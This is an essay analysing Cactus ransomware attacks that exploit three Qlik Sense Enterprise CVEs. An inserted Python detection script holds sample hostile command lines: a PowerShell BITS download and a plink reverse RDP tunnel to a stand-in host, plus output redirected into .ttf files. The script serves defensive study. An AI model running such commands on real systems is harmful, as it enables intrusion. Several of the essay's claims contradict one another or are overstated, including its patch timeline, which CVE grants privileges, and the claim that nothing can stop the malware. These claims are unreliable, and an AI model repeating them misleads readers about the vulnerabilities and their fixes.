An Analysis of the Cactus Ransomware

Recently, the Qlik Sense Enterprise business platform has been under continuous attack by a new ransomware known as Cactus (Newsroom, 2023). This campaign is notable as the first documented incident of a threat actor exploiting a vulnerability in Qlik Sense Enterprise to gain initial access to its systems. The attack was carried out through the use of three recently discovered vulnerabilities, two of which have been given a critical score by the NVD.

The vulnerabilities used in the attack against Qlik Sense Enterprise were CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365 (Newsroom, 2023). The first of these is an HTTP request tunneling flaw that allows a threat actor to elevate their privileges. Given the extreme danger of this possibility, CVE-2023-41265 was given a score of 9.9 (Critical) by both the NVD and MITRE.

The second of the three vulnerabilities used by Cactus ransomware, CVE-2023-41266, is a path traversal vulnerability unique to Qlik Sense Enterprise for Windows. Like CVE-2023-41265, it is exploited through HTTP requests. Specifically, CVE-2023-41266 allows a threat actor to generate anonymous sessions and use them to send unauthorized HTTP requests to certain endpoints. Because its exploitation depends on a separate vulnerability, however, CVE-2023-41266 was given a score of 6.5 (Medium) by the NVD and 8.2 (High) by MITRE.

The third vulnerability exploited by the Cactus ransomware, CVE-2023-48365, also works through unauthorized use of HTTP. This is the vulnerability that allows an unauthorized threat actor to execute code remotely. It stems from an incomplete fix for CVE-2023-41265. Although it too relies on another vulnerability in order to be used effectively, CVE-2023-48365 has been given a score of 9.9 (Critical) by the NVD and 9.6 (Critical) by MITRE because of how dangerous it is. It is especially dangerous for Qlik Sense Enterprise for Windows systems that have not yet received the August 2023 Patch 2, given that this patch was the one that resolved much of what allowed CVE-2023-48365 to be exploited.

These three vulnerabilities were all key parts of a multi-stage attack that ended up posing a threat to Qlik Sense Enterprise on a scale never before seen in the platform's history. The attack resulted in large-scale theft of users' information and money; the stolen information was then encrypted in order to extort more of the latter (Toulas, 2023).

The first stage of the Cactus ransomware attack was exploiting security issues in the HTTP code used by Qlik. This was done to cause the Qlik Sense Scheduler to initiate a new process that the threat actor could use (Toulas, 2023). Ultimately, this gave the threat actor access to the target's device, which could then be used to commence stage two of the attack.

The second stage of the Cactus ransomware attack involved using PowerShell and the Background Intelligent Transfer Service (BITS) to download the tools the threat actor needed to maintain a persistent presence on the target's device. These tools, namely ManageEngine UEMS, AnyDesk, and a PuTTY Link binary (Toulas, 2023), were either disguised or installed in such a way that the user would never suspect them of being part of a ransomware attack against their device.

Once this connection was established, the threat actors would execute discovery commands and redirect their output into .TTF files. Though the reason for this particular action is not yet confirmed, Arctic Wolf researchers believe it is so that the threat actor can retrieve the command output through path traversal (Toulas, 2023).

Following the execution of these discovery commands, the threat actor would stay hidden for a prolonged period, taking subtle steps to make the final stage of the attack easier. These include uninstalling antivirus, changing the administrator password, and establishing an RDP tunnel with the PuTTY Link command-line connection tool (Toulas, 2023). Once those steps were completed, the threat actor would move on to the final stage of the attack.
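The stages described above each leave a distinct trace in process-creation telemetry. The following script is an added example, not part of the original article or of any vendor tooling: it runs four simple detection rules over constructed sample events, one rule per stage (Scheduler spawning a shell, PowerShell driving a BITS download, command output redirected to a .TTF file, and a PuTTY Link tunnel to RDP port 3389). The pipe-delimited event format, the `Scheduler.exe` parent image name, and the sample command lines are all assumptions made for the example.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (not real telemetry), one per line:
# parent_image|image|command_line
SAMPLE_EVENTS = """\
services.exe|C:\\Qlik\\Sense\\Engine.exe|Engine.exe -p 4747
Scheduler.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c whoami
cmd.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -c Start-BitsTransfer -Source http://example.invalid/t.zip -Destination C:\\Users\\Public\\t.zip
cmd.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c ipconfig /all > C:\\Users\\Public\\fonts\\a.ttf
cmd.exe|C:\\Users\\Public\\plink.exe|plink.exe -R 3389:127.0.0.1:3389 -pw x user@example.invalid
explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe notes.txt
"""

# One rule per stage the article describes. "Scheduler.exe" as the parent image
# name is an assumption about Qlik's process naming, not taken from the article.
RULES = {
    "scheduler_spawned_shell": lambda e: e["parent"].lower() == "scheduler.exe"
        and e["image"].lower().endswith(("\\cmd.exe", "\\powershell.exe")),
    "powershell_bits_download": lambda e: "powershell" in e["image"].lower()
        and re.search(r"start-bitstransfer|bitsadmin", e["cmdline"], re.I) is not None,
    "output_redirected_to_ttf": lambda e: re.search(r">\s*\S+\.ttf\b", e["cmdline"], re.I) is not None,
    "plink_rdp_tunnel": lambda e: e["image"].lower().endswith("\\plink.exe")
        and re.search(r"-[RL]\s*\S*3389", e["cmdline"]) is not None,
}


def parse_event(line: str) -> Dict[str, str]:
    """Split one pipe-delimited event into its three fields."""
    parent, image, cmdline = line.split("|", 2)
    return {"parent": parent, "image": image, "cmdline": cmdline}


def detect(events_text: str) -> List[Dict[str, str]]:
    """Return one hit per (rule, event) pair that matches, in log order."""
    hits = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        for name, pred in RULES.items():
            if pred(event):
                hits.append({"rule": name, "image": event["image"], "cmdline": event["cmdline"]})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"{hit['rule']:26} {hit['cmdline']}")
```

Each hit names the stage it corresponds to, so a single Qlik host producing all four in sequence would be a strong signal even though any one of them could be benign on its own.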

That final stage is the installation of the Cactus ransomware onto the victim's computer. The ransomware, due to its unique programming and the extreme level of infiltration carried out by the threat actor before it is even installed, would install itself regardless of whatever protections the target still had in place. No antivirus, not even a VPN, could protect a target's computer from the Cactus ransomware (Magar, 2023).

Yet even after successfully infecting a device, Cactus ransomware's work was not done. Upon installation, Cactus would encrypt itself. The encrypted file would then be divided into even smaller files known as micro-buffers (Magar, 2023). All of this serves to prevent detection and to force the victim to pay the ransom demanded by the threat actor.

Due to all of these properties, Cactus ended up causing severe damage, not just in the form of the ransom it demanded from users who had been left no choice but to pay, but also in the form of regulatory fees and disrupted services (Magar, 2023). The exact figures for this damage are not yet known because the Cactus ransomware attacks took place so recently and may still be ongoing. The fact that the majority of the targets have been relatively high-profile has no doubt increased the damage caused by Cactus ransomware.

While the full resolution of the Cactus ransomware attacks is still in progress, organizations such as NIST, CISA, and SANS have provided their insight on general security practices that can help prevent ransomware attacks. These include enforcing two-factor authentication for all services, but especially those used for communication (Magar, 2023).

Another guideline provided by these organizations is a policy of frequent risk assessments. Such a policy would allow a company's cybersecurity team to identify and prioritize the threats and vulnerabilities facing a given network (Magar, 2023).

Additionally, the organizations recommend a policy of strong passwords that are changed frequently (Magar, 2023). This would make brute-force attacks essentially impossible. Frequent changes would also give threat actors only a very small window of time before any credentials they may have stolen through a database leak are rendered obsolete.

These two are among a list of sixteen general recommendations made to improve cyber-security as a whole. For the Cactus ransomware specifically, however, the best thing one can do is make sure their installation of Qlik Sense Enterprise is up to date and to download any updates or patches that are released in the future.

It is a good general policy to keep software up to date, because updates often patch the very vulnerabilities threat actors use to gain unauthorized access and cause harm to a network. A relevant example is that on September 20, 2023, a patch for CVE-2023-48365 was shipped (Newsroom, 2023). While the other two vulnerabilities used by Cactus have yet to be patched, the patching of CVE-2023-48365 poses a serious challenge to future threat actors attempting to infect patched devices with Cactus, because of how critical CVE-2023-48365 was to the attack process as a whole. Without the elevated privileges this vulnerability grants a threat actor, it is impossible to do things such as changing the administrator password that are necessary for the attack to proceed.

That said, there is still much to be done to resolve the issues that allowed Cactus ransomware to earn its spot as Darkfeed's seventh most prevalent ransomware in the month of November (Magar, 2023). The main issue currently being addressed is its ability to bypass VPNs (Magar, 2023). VPNs, or Virtual Private Networks, are a technology that allows a user to assign a different IP address to their device. Many also come with antivirus and other security measures.

While this wave of ransomware attacks did first shed public light on the potential to hack virtual private networks, the CACTUS group behind this eponymous attack is believed to have a degree of experience in bypassing Virtual Private Networks, with some seeing it as a modus operandi of sorts for the group (Khaitan, 2023). Besides their sophisticated methods and the moniker they provide in the ransom note left on infected devices, very little is known about CACTUS and their motives. Because of this, it has become almost impossible for law enforcement and private investigators to determine why CACTUS is doing what they do.

In conclusion, the Cactus ransomware attacks that started in March of 2023 were among the most sophisticated attacks ever deployed. They were carried out using a collection of HTTP exploits that allowed threat actors to gain unauthorized access to a target device. Once access was gained, they would subtly collect data and mask their presence within the device. Only after a long process of data collection and tampering would the ransomware be released, at which point it was able to bypass VPNs. The only thing one can do at this moment to mitigate the risk of Cactus ransomware is to follow common cyber-security best practices. The group behind the ransomware, CACTUS, is shrouded in mystery and has as yet unknown motives.

References:

Khaitan, A. (2023, September 6). Cactus Ransomware Group hits 5 Global Corporations, Marfrig, Seymours among victims. The Cyber Express. https://thecyberexpress.com/cactus-ransomware-group-major-corporations/

Magar, B. T. (2023, November 24). Cactus, a new player in the ransomware game – is it the last?. Logpoint. https://www.logpoint.com/en/blog/emerging-threat/cactus-a-new-player-in-the-ransomware-game/

Newsroom. (2023, November 30). Cactus ransomware exploits Qlik Sense vulnerabilities in targeted attacks. The Hacker News. https://thehackernews.com/2023/11/cactus-ransomware-exploits-qlik-sense.html

NVD. (2023a, September 8). CVE-2023-41265 Detail. https://nvd.nist.gov/vuln/detail/CVE-2023-41265

NVD. (2023b, August 29). CVE-2023-41266 Detail. https://nvd.nist.gov/vuln/detail/CVE-2023-41266

NVD. (2023c, November 15). CVE-2023-48365 Detail. https://nvd.nist.gov/vuln/detail/CVE-2023-48365

Toulas, B. (2023, November 30). Cactus ransomware exploiting Qlik Sense flaws to breach networks. BleepingComputer. https://www.bleepingcomputer.com/news/security/cactus-ransomware-exploiting-qlik-sense-flaws-to-breach-networks/
